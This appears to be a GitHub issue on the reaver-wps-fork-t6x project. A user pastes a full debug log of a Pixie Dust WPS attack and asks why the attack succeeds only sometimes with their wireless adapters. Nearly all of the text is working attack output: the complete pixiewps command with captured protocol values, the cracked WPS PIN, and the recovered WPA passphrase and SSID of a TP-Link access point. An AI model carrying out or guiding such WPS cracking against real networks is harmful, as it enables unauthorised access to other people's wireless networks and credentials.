executing pixiewps -e a074ad2e4de786d8c0b212a99fa3be24ac682d67489cde27dbda3a7e0041669581cab18d9f4baf43ca32811da7016d0997696d6ee7f31ac615f4faca62e9546ed61ed520846610df9c059980f9e9251afaee9cf3a85123792f19e3acf7a45f22a8a94a6ada72b4fe6a94f50ea48db1b907c558314e42dde510df6a56b0adb835fb18536d5e2bb9fb3e1f038f917af8b6e077e5a4be39e211cfe26c4479b2e0551a8dddd9f44dd8c64593a007bf9c11e6bd80662cd8358e5a9ad02f50eb8601f3 -s 831c77ec56d61770c3a023270c7a1258287a220d15ada9b2d19d2e365c19843e -z 88303dac90d1f4ceace348064ac1edc9d059137be34cbbb3d1c28a9078004d28 -a f5507ddc01c2104d92fa78efc9ed9888deeaec2ff3bf958eeed73576366d41e4 -n 8a0953f89ce8a64679d9a880dd087fb0 -r 18d5cf9aa2c40ec003be8e0f7527691b0dddb9c9f2715d0893cdcff86436c160c3b012249a5dc51cf3831fd3c3fd66031080e74b5ce48e7e54f83450e310e7148d01ffc4deb629a406825f966a3d6cbbfd74302f46cb4aca889d9128dde19421d69909008b5169edb1008b8b67483bd486e76385fd8b1804428dc8b30ff4b97171706028023c33e35bbc795cf02143b2033c65c7d4b0a1f571c2a7142d142e882d6b70aefc99c700c55987aef2c54fa0758580f9222ea6f08d2350edd460733a

 Pixiewps 1.4

 [?] Mode:     1 (RT/MT/CL)
 [*] Seed N1:  0xd178e0e7
 [*] Seed ES1: 0x00000000
 [*] Seed ES2: 0x00000000
 [*] PSK1:     8865fdd8300c5adfbf4fd6ec51d78c86
 [*] PSK2:     1c7ac09e53040f16e14838c4016beb31
 [*] ES1:      00000000000000000000000000000000
 [*] ES2:      00000000000000000000000000000000
 [+] WPS pin:  39801296

 [*] Time taken: 0 s 32 ms

[+] Pixiewps: success: setting pin to 39801296
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M3 message
WPS: Building Message M4
WPS: Dev Password Len: 8
WPS: Dev Password: 39801296
WPS: Device Password - hexdump_ascii(len=8):
     33 39 38 30 31 32 39 36                           39801296        
WPS: PSK1 - hexdump(len=16): 88 65 fd d8 30 0c 5a df bf 4f d6 ec 51 d7 8c 86
WPS: PSK2 - hexdump(len=16): 1c 7a c0 9e 53 04 0f 16 e1 48 38 c4 01 6b eb 31
Allocs OK, building M4 packet
WPS:  * Version
WPS:  * Message Type (8)
WPS:  * Enrollee Nonce
WPS: R-S1 - hexdump(len=16): 04 e1 67 ee 24 54 79 f8 81 3e e0 d7 57 d9 fa af
WPS: R-S2 - hexdump(len=16): ec c0 f3 b6 ca da 7e 3f 5c 9e 74 63 65 2b cb e9
WPS:  * R-Hash1
WPS: R-Hash1 - hexdump(len=32): b3 f8 4d d2 07 b0 e8 61 6e e6 4a 64 47 10 af 75 ae 85 bf 96 12 a6 73 a2 a9 f3 96 5d ef 5a 02 9c
WPS:  * R-Hash2
WPS: R-Hash2 - hexdump(len=32): 5a 70 f7 a7 22 dd 2f c8 30 2e 56 63 b7 65 a9 12 44 3e 2d 9c 89 4a 69 e3 7e ff b8 b4 6c 23 9e 35
WPS:  * R-SNonce1
WPS:  * Key Wrap Authenticator
WPS:  * Encrypted Settings
WPS:  * Authenticator
[+] Sending M4 message
send_packet called from send_msg() send.c:116
WPS: Processing received message (len=120 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M5
WPS: Processing decrypted Encrypted Settings attribute
WPS: E-SNonce1 - hexdump(len=16): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
WPS: Enrollee proved knowledge of the first half of the device password
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M5 message
WPS: Building Message M6
WPS:  * Version
WPS:  * Message Type (10)
WPS:  * Enrollee Nonce
WPS:  * R-SNonce2
WPS:  * Key Wrap Authenticator
WPS:  * Encrypted Settings
WPS:  * Authenticator
[+] Sending M6 message
send_packet called from send_msg() send.c:116
WPS: Processing received message (len=168 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M7
WPS: Processing decrypted Encrypted Settings attribute
WPS: E-SNonce2 - hexdump(len=16): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
WPS: Enrollee proved knowledge of the second half of the device password
WPS: Invalidating used wildcard PIN
WPS: Invalidated PIN for UUID - hexdump(len=16): 28 80 28 80 28 80 18 80 a8 80 a0 40 a0 6c bb 6f
WPS: Processing AP Settings
WPS: SSID - hexdump_ascii(len=15):
     74 70 2d 6c 69 6e 6b 41 44 32 33 34 43 42 41      tp-linkAD234CBA 
WPS: Authentication Type: 0x20
WPS: Encryption Type: 0x8
WPS: Network Key Index: 1
WPS: Network Key - hexdump(len=8): 31 32 33 34 35 36 37 38
WPS: MAC Address a0:40:a0:6c:bb:6f
WPS: Update local configuration based on the AP configuration
WPS: Processing AP Settings
WPS: SSID - hexdump_ascii(len=15):
     74 70 2d 6c 69 6e 6b 41 44 32 33 34 43 42 41      tp-linkAD234CBA 
WPS: Authentication Type: 0x20
WPS: Encryption Type: 0x8
WPS: Network Key Index: 1
WPS: Network Key - hexdump(len=8): 31 32 33 34 35 36 37 38
WPS: MAC Address a0:40:a0:6c:bb:6f
WPS: Update local configuration based on the AP configuration
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M7 message
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
[+] Updated P1 array
[+] Updated P2 array
[+] Quitting after pixiewps attack
[+] Pin cracked in 6 seconds
[+] WPS PIN: '39801296'
[+] WPA PSK: '12345678'
[+] AP SSID: 'tp-linkAD234CBA'

Using RT8812au chipset, same results with alfa AW036nHA and Alfa AC1900 8814au.
Any clue? Regards

t6x / reaver-wps-fork-t6x

2 pixie attacks same kind of output but 1 out of 2 successful #345